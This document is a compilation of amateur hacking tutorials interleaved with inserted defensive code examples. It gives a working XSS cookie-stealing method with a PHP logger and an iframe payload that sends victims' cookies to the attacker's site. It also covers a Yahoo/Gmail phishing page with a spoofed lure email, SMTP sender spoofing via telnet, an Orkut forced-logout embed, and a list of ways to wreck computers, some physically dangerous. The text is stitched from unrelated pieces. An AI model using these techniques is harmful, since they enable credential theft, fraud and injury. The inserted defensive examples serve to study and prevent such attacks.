Cookie Stealing for fun and profit

0x10 Introduction

XSS (cross site scripting) is usually criticized. It is said that XSS can do nothing, actually. All it can do is make a nice little alert box on your screen, telling you your cookies. That is a wrong assumption. Although it may be slightly difficult, you can use XSS to steal a user’s cookies. Cookies are used to store valuable information such as Username, Password, IP address and much more. This tutorial aims at teaching you Cookie Stealing, and by the end of this text file, you should be able to independently steal other people’s cookies.

DISCLAIMER:
This text is for educational purposes only. The author will not be held liable for any damages that occur from a reader for following this text or even learning from it.
######################################################

0x20 Finding the vulnerability

First, you have to find the XSS vulnerability. This may prove to be a bit of a challenge, but for sites with lower security, this is actually quite easy. For example, have you ever seen one of those guestbooks? Some of them are not properly configured to filter the text you type in. What does this mean? It means that you can manipulate the HTML of the page, and inject javascript code! Alright, let’s start off with something simple. Type this into the guestbook:
<script type="text/javascript">
alert(document.cookie)
</script>
Okay, now that’s done, click enter. If the guestbook does not properly check its input, then you should be able to see your cookie pop up! Of course, if you type that in and it doesn’t work, it’s probably gonna be a bit embarrassing, especially when the site admin taunts you. Anyway, to test whether a guestbook properly filters its input, type something like “You guys <b>suck</b>.” and see if the “suck” comes up in bold text.
If it does, the guestbook is probably not configured to filter input. However, XSS is not limited to guest books. Places in which you can change the HTML, such as a page that uses a URL parameter to display an image or text, can be injected with a healthy dose of XSS. For example, the URL is this:
site/bla.php?whatever=lol.gif
Now, imagine what the HTML for the image would be like…
<img src="lol.gif">
so they add a "> at the back, which means we can do this:
(start URL here)
site/bla.php?whatever=lol.gif"><script type="text/javascript">
alert(document.cookie)</script><a href="test
(End url here)
and you’re done!
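Added example, not part of the original text: the image-parameter rendering described above next to a hardened version, plus text-only rendering for guestbook entries. The function names, the file-name allowlist and placeholder.gif are assumptions made for illustration.

```javascript
// Added example (not from the original page). All names here are hypothetical.

// Mirrors the behaviour described above: the parameter lands in the attribute unescaped.
function renderVulnerable(whatever) {
  return '<img src="' + whatever + '">';
}

// HTML-escape for element text and quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  }[c]));
}

// Allowlist the expected shape (a plain image file name) before anything else.
const IMAGE_NAME = /^[A-Za-z0-9_-]{1,64}\.(gif|png|jpe?g)$/;

// Hardened: reject anything that is not a plain file name, and still escape on
// output so a later loosening of the pattern does not reopen the hole.
function renderHardened(whatever) {
  if (typeof whatever !== 'string' || !IMAGE_NAME.test(whatever)) {
    return '<img src="placeholder.gif" alt="">';
  }
  return '<img src="' + escapeHtml(whatever) + '" alt="">';
}

// Guestbook case: visitor text is rendered as text, never as markup.
function renderGuestbookEntry(text) {
  return '<p class="entry">' + escapeHtml(text) + '</p>';
}

// Constructed inputs matching the two probes used in this section.
const probe = 'lol.gif"><script type="text/javascript">alert(document.cookie)</script><a href="test';
const boldProbe = 'You guys <b>suck</b>.';

console.log(renderVulnerable(probe));        // the script tag survives intact
console.log(renderHardened(probe));          // falls back to the placeholder image
console.log(renderGuestbookEntry(boldProbe)); // tags shown as literal text
```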

######################################################

0x30 Opening the gate

(This chapter is only for those who chose the URL as the XSS injection point, by the way)
Alright, all this is nice and pretty, but as I have said at the top, people criticize XSS as it can only work in your browser.
This means that to get an enemy’s password, you have to get him to sit down, login, and go to the injection page, then show you the alert box. Forgive my language, but like HELL that’s going to work. You have to be smart. You have to TRICK them into going into the page, and then use a technique I will explain in a later section to get their cookies.
This tricking technique is something known as social engineering. Don’t worry; it’s not complicated at all. All you have to do is fool your friend. For example, if the page you are fooling him into going into is the guestbook, then you can say something like “Look at this cool guestbook! (insert URL here)” Be Creative. Don’t do it yet though, we still have the last piece of preparation to go…
######################################################

0x40 The Stealing

But once the luser goes to the site, what do you do then? “Hey, tell me all that info in that suspicious looking text box please?” Yeah right.
This is where the PHP code comes in. Get a free web host that supports PHP (preferably something like www.t35.com, although you will be breaking the rules in their TOS…) and make a new file. In the new file, type in this:

<html>

<body>

<?php

$stuff=$_GET['stuff'] . "\n";

$fh=fopen('evil.txt','ab');

fwrite($fh,$stuff);

fclose($fh);

?>

</body>

</html>


Wheee that was fun. Alright, save it as evil.php. Now make an empty text file named evil.txt, and type some stuff into it such as “Cookie Stealer Phile (Newline here)”. Alright, now you have to change the script that you put into the vulnerable site. Change it to

<IFRAME SRC=”javascript:window.location=%22(site)/evil.php?stuff=%22+document.cookie” height=”1″ width=”1″ frameborder=”0″></IFRAME>

Of course, change (site) into your site, and you are ready to go! Whenever a new luser gets lured into the trap, his cookies will be added to evil.txt!
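Added example, not part of the original text: the stuff= parameter can only carry what document.cookie exposes, and a cookie set with HttpOnly is never exposed to page script. The sketch below models that and audits session-like cookies for missing attributes; the sample headers, function names and the name pattern are constructed for illustration.

```javascript
// Added example (not from the original page). Names and sample headers are hypothetical.

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map(p => p.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const a of rest) {
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// What a script on the page would see in document.cookie:
// every cookie except those flagged HttpOnly.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders.map(parseSetCookie)
    .filter(c => !c.attrs.httponly)
    .map(c => c.name + '=' + c.value)
    .join('; ');
}

// Flag session-like cookies missing HttpOnly (blocks script reads),
// Secure (blocks plaintext transport) or SameSite (limits cross-site sending).
function auditCookies(setCookieHeaders, sensitive = /sess|auth|token|sid/i) {
  const findings = [];
  for (const c of setCookieHeaders.map(parseSetCookie)) {
    if (!sensitive.test(c.name)) continue;
    for (const flag of ['httponly', 'secure', 'samesite']) {
      if (!c.attrs[flag]) findings.push(c.name + ': missing ' + flag);
    }
  }
  return findings;
}

// Constructed sample headers: the same site before and after hardening.
const weak = ['PHPSESSID=abc123; Path=/', 'theme=dark; Path=/'];
const hardened = ['PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax', 'theme=dark; Path=/'];

console.log(scriptVisibleCookies(weak));     // session id is readable by script
console.log(scriptVisibleCookies(hardened)); // only the theme preference is readable
console.log(auditCookies(weak));
```

HttpOnly only removes the session cookie from what injected script can read; the injection itself still has to be fixed by escaping output.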
######################################################

Sending a Computer to Hell

I was lying around thinking of ways to send a computer to hell and here were my ideas:

1. Flash the bios with a bogus file <and do not back up the bios>.
2. Run a magnet over EVERYTHING.
3. Using the control panel, add hardware that doesn't exist.
4. Change user passwords.
5. Click to every spyware site you can go to.
6. Install 100 virii <and the ones that mutate might breed with e/o>.
7. Write a little jscript (or vb) prog that makes 1000 popups and then one that you have to answer yes to for it to stop and make it run every bootup.
8. Change the language to Chinese.
9. Glue the CD drive shut.
10. <this is very dangerous> put water on the power cable and then some metal filings and then plug in <try not to get shocked>.
11. Jam a piece of metal in a slot <pci, ram, etc>.
12. Fry the motherboard by taking a car battery and sending a surge of power through it.

Some more:

- Tape the CPU fan.
- Pull out a capacitor.
- Connect the IDE cables with the computer on (did this by accident once).
- Anything with water works..
- Burying in sand and turning it on directly afterwards.
- Submerging the hard drive, then remove it, put it in the fridge, wait 2 hrs, and plug it into the computer.
- Connect it to a lightning rod grounding wire.
- While you're at a skyscraper doing this, just toss it out the window somewhere above the 10th floor.
- create a batch script to partition the drive for a few hours/days.
- overclock and remove all fans.

Any More Ideas?

Block your friends scrapbook – ORKUT

It will be really scary when you find out that you are not able to reply to your friend’s scrap from your own scrapbook. Yes, this hack can be used to block anybody’s scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him. Really cool!

Copy this and paste in your friends scrapbook.

<embed src=”http://www.orkut.com/GLogin.aspx?cmd=logout”></embed>

After this, whenever anybody enters his scrapbook, he will be redirected to his login screen. The victim won’t be able to reply from his scrapbook, and no one can enter his profile and scrap him…

Solution : (To Unblock it)

To avoid being logged off again when you see the scrap, you can block flash in your browser.

For Firefox download the following plugin :

https://addons.mozilla.org/en-US/firefox/addon/433

In opera, you can disable the flash plugin.

Now this will only allow you to enter the scrapbook but your friends will still not be able to scrap you. So for that you need to delete the scrap.

Another Method:

First open your scrapbook.

Now open your Orkut homepage in a new window (don’t close the scrapbook). You will find the login page.

Now enter your detail and login to Orkut.

After being logged in delete the scrap from the scrapbook page that you had kept open.

Enjoy!!!
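Added example, not part of the original text and not Orkut's code: the trick above works because logout is triggered by a plain GET that any embedded tag can issue. A logout decision that only accepts a same-origin POST carrying the session's CSRF token ignores such embedded requests. The request and session shapes and the function names are assumptions; Sec-Fetch-Site is the standard Fetch Metadata request header.

```javascript
// Added example (not from the original page). Request/session shapes are hypothetical.

// Compare two tokens without stopping at the first differing character.
function tokensMatch(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Decide whether a logout request should end the session.
function decideLogout(req, session) {
  // 1. State changes never happen on GET, so <embed>, <img> and <iframe> cannot trigger them.
  if (req.method !== 'POST') {
    return { status: 405, loggedOut: false, reason: 'logout requires POST' };
  }
  // 2. If the browser reports where the request came from, require same-origin.
  const site = req.headers['sec-fetch-site'];
  if (site !== undefined && site !== 'same-origin') {
    return { status: 403, loggedOut: false, reason: 'cross-site request' };
  }
  // 3. Require the per-session CSRF token from the site's own logout form.
  if (!tokensMatch((req.body || {}).csrf, session.csrfToken)) {
    return { status: 403, loggedOut: false, reason: 'bad CSRF token' };
  }
  return { status: 200, loggedOut: true, reason: 'ok' };
}

// Constructed requests: the embedded-tag fetch from a scrap, and a genuine logout click.
const session = { csrfToken: 'constructed-token-0001' };
const embeddedFetch = { method: 'GET', headers: { 'sec-fetch-site': 'cross-site' }, body: {} };
const realClick = { method: 'POST', headers: { 'sec-fetch-site': 'same-origin' },
                    body: { csrf: 'constructed-token-0001' } };

console.log(decideLogout(embeddedFetch, session)); // rejected with 405
console.log(decideLogout(realClick, session));     // accepted
```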

How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)

In the previous version of “how to hack gmail or yahoo or hotmail or any other”, one problem faced was that whenever the victim clicked on login a message would come up saying “This page will send your information through email”, which could sometimes fail your hack. But in this new version this problem is eliminated and this has become more foolproof than the previous version.
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.

Now follow the following steps :

  1. Open the website of HotMail or GMail or YahooMail, it’s your wish. If you want to HACK a yahoo id, then go to www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of the yahoo page. Now press “CTRL+A” and copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the file yahoofake.html using Notepad. Here you’ll find code which starts with <form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form"> (This code is for Yahoo. For any other site this code will be different, but you need to find the code starting with (form method="post" action="xxxxxxxxxxxxx"))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=”New_Form” action=”http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”>

Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.

First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”.

Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make it very long so that the victim does not see the name of the webhost in the link.

Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.

After reading this, your victim will click and log in through the page you created. As you have given the redirection URL as the URL of the site itself, it will go to the login page again, and the victim will think that he might have given the wrong password so the page came again. In reality the username and password have been sent to the email account you specified, and the victim still does not know that his account is hacked.

If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck !
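Added example, not part of the original text: the cloned page described above gives itself away in two places a mail filter or URL scanner can check, namely the host the page is served from and the host its login form posts to. The host names in the sample are constructed placeholders, and the function names are assumptions.

```javascript
// Added example (not from the original page). Hosts and names below are constructed.

// True only if host is the domain itself or a subdomain of it.
// "mail.yahoo.com.something.example" does NOT belong to yahoo.com.
function hostBelongsTo(host, domain) {
  const h = host.toLowerCase().replace(/\.$/, '');
  return h === domain || h.endsWith('.' + domain);
}

// Inspect a login page: where is it served from, and where do its forms send data?
// A regex is enough for this sketch; a production scanner would use an HTML parser.
function auditLoginPage(html, pageUrl, expectedDomain) {
  const findings = [];
  const page = new URL(pageUrl);
  if (!hostBelongsTo(page.hostname, expectedDomain)) {
    findings.push('page host ' + page.hostname + ' is not under ' + expectedDomain);
  }
  if (page.protocol !== 'https:') findings.push('page is not served over https');

  const formAction = /<form\b[^>]*\baction\s*=\s*["']([^"']*)["']/gi;
  let m;
  while ((m = formAction.exec(html)) !== null) {
    let host = '';
    try { host = new URL(m[1], pageUrl).hostname; } catch (e) { /* unparsable action */ }
    if (!hostBelongsTo(host, expectedDomain)) {
      findings.push('form posts to ' + (host || 'an unparsable target'));
    }
  }
  return findings;
}

// Constructed samples: a genuine-looking page and a clone with a swapped form action.
const genuineHtml = '<form method="post" action="https://login.yahoo.com/config/login?" name="login_form">';
const cloneHtml = '<form name="New_Form" action="http://forms.collector.example/submit?id=PLACEHOLDER" method="post">';
const cloneUrl = 'http://mail.yahoo.com.support-000111.webhost.example/';

console.log(auditLoginPage(genuineHtml, 'https://login.yahoo.com/', 'yahoo.com')); // []
console.log(auditLoginPage(cloneHtml, cloneUrl, 'yahoo.com'));                     // three findings
```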

Learn how to send your fake email

So, you want to learn how to send your own fake mail? It’s extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux – any modern PC that has an internet connection will do it.

There are just a few simple steps. First, you’ll need to decide on the FROM and the TO email addresses. If the FROM address that you’re choosing isn’t a real one, make sure that the domain name (the bit after the @ sign) is a real one. If it’s not a real one, it almost certainly won’t work.


For the purpose of this tutorial, we’ll be sending from bush@whitehouse.gov to dummy@anysite.com.

Second, you’ll need to find out the mail server that your recipient is using.

Windows: Click Start, Run, enter “CMD”, then press OK. In the window that comes up, type nslookup -q=MX anysite.com
Macintosh: Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com
Linux: Bring up your favourite shell, and type nslookup -q=MX anysite.com

There will be a lot of information on the screen – all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest “preference number”.

anysite.com        MX preference = 10, mail exchanger = mail.anysite.com

Now, you’ll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default – see this note about getting telnet on Vista before you continue. When you’re ready, type:

telnet mail.anysite.com 25

Press enter, and after a short pause, you should see a welcome message from the server.

Ok, so now you’re connected. You need to enter the following information – press ENTER at each new line. You won’t be able to press backspace to delete a mistake, so you’ll need to type everything correctly first time!

HELO whitehouse.gov

This tells the mail server that we are “whitehouse.gov”.

MAIL FROM:

This tells the server who is sending the mail.

RCPT TO:

This tells the server who to deliver the mail to. At this point, if the recipient doesn’t exist, you may see a warning message (but not always).

DATA
This tells the server that we’re ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don’t forget that full stop at the end.
Hello dummy@anysite, I managed to send a fake mail all by myself!.

Don’t forget that last dot. When you’ve done that, and pressed enter, simply enter QUIT and your mail should be delivered.

There’s a little bit more to it, of course. You’ll need to enter proper “headers” if you want the mail to look more believable. After doing the DATA command, I’d recommend pasting in the following “headers” to make sure it looks realistic when viewed in Outlook, Hotmail, etc.

Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)
From: George W Bush
To: Poor Sod
Subject: Fake mail

Hello dummy@anysite, I managed to send a fake mail all by myself!.

And that’s all there is to it.
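Added example, not part of the original text: SMTP itself accepts any MAIL FROM, so receiving servers check the connecting IP address against the SPF record published by the sender's domain. The sketch below evaluates only the ip4 and all mechanisms (the others need DNS lookups and are skipped); the record and addresses are constructed, and the function names are assumptions.

```javascript
// Added example (not from the original page). Record and IPs are constructed samples.

// Convert dotted-quad IPv4 to an unsigned 32-bit integer, or null if malformed.
function ip4ToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) return null;
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

// True if ip falls inside cidr (e.g. "192.0.2.0/24"; a bare address means /32).
function inCidr(ip, cidr) {
  const [net, bitsStr] = cidr.split('/');
  const bits = bitsStr === undefined ? 32 : Number(bitsStr);
  const a = ip4ToInt(ip), n = ip4ToInt(net);
  if (a === null || n === null || !Number.isInteger(bits) || bits < 0 || bits > 32) return false;
  const mask = bits === 0 ? 0 : (~0 << (32 - bits)) >>> 0;
  return ((a & mask) >>> 0) === ((n & mask) >>> 0);
}

// Evaluate an SPF record for the IP that opened the SMTP connection.
// Terms are checked left to right; the first match decides the result.
function evaluateSpf(record, clientIp) {
  const terms = record.trim().split(/\s+/);
  if (terms.shift() !== 'v=spf1') return 'none';
  const results = { '+': 'pass', '-': 'fail', '~': 'softfail', '?': 'neutral' };
  for (let term of terms) {
    let qualifier = '+';
    if ('+-~?'.includes(term[0])) { qualifier = term[0]; term = term.slice(1); }
    if (term === 'all') return results[qualifier];
    if (term.startsWith('ip4:') && inCidr(clientIp, term.slice(4))) return results[qualifier];
    // a, mx, include, exists, ip6: need DNS or IPv6 handling, not modelled here.
  }
  return 'neutral';
}

// Constructed record for a sending domain, and two connecting addresses.
const SAMPLE_RECORD = 'v=spf1 ip4:192.0.2.0/24 -all';
const AUTHORISED_IP = '192.0.2.25';   // the domain's real outbound server
const TELNET_IP = '203.0.113.9';      // someone typing MAIL FROM by hand from elsewhere

console.log(evaluateSpf(SAMPLE_RECORD, AUTHORISED_IP)); // pass
console.log(evaluateSpf(SAMPLE_RECORD, TELNET_IP));     // fail
```

SPF checks the MAIL FROM domain, not the From: header shown to the reader; DMARC is what ties the visible From: domain to an SPF or DKIM pass.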

A JavaScript Trick That Pops the Message "Ur Account Is Hacked"

javascript:function reverse() { var inp = "rekcaH yrgnuH yb dekcah si tnuocca tukrO ruoY "; var outp = ""; for (var i = 0; i < inp.length; i++) { outp = inp.charAt(i) + outp; } alert(outp); } reverse();

Copy and paste the above link into the address bar, replace “rekcaH yrgnuH” with your own name, and send it to your friends.

Or you can manually create any kind of alert box with:

javascript:alert(" TYPE ANY MESSAGE HERE TO APPEAR IN ALERT BOX ")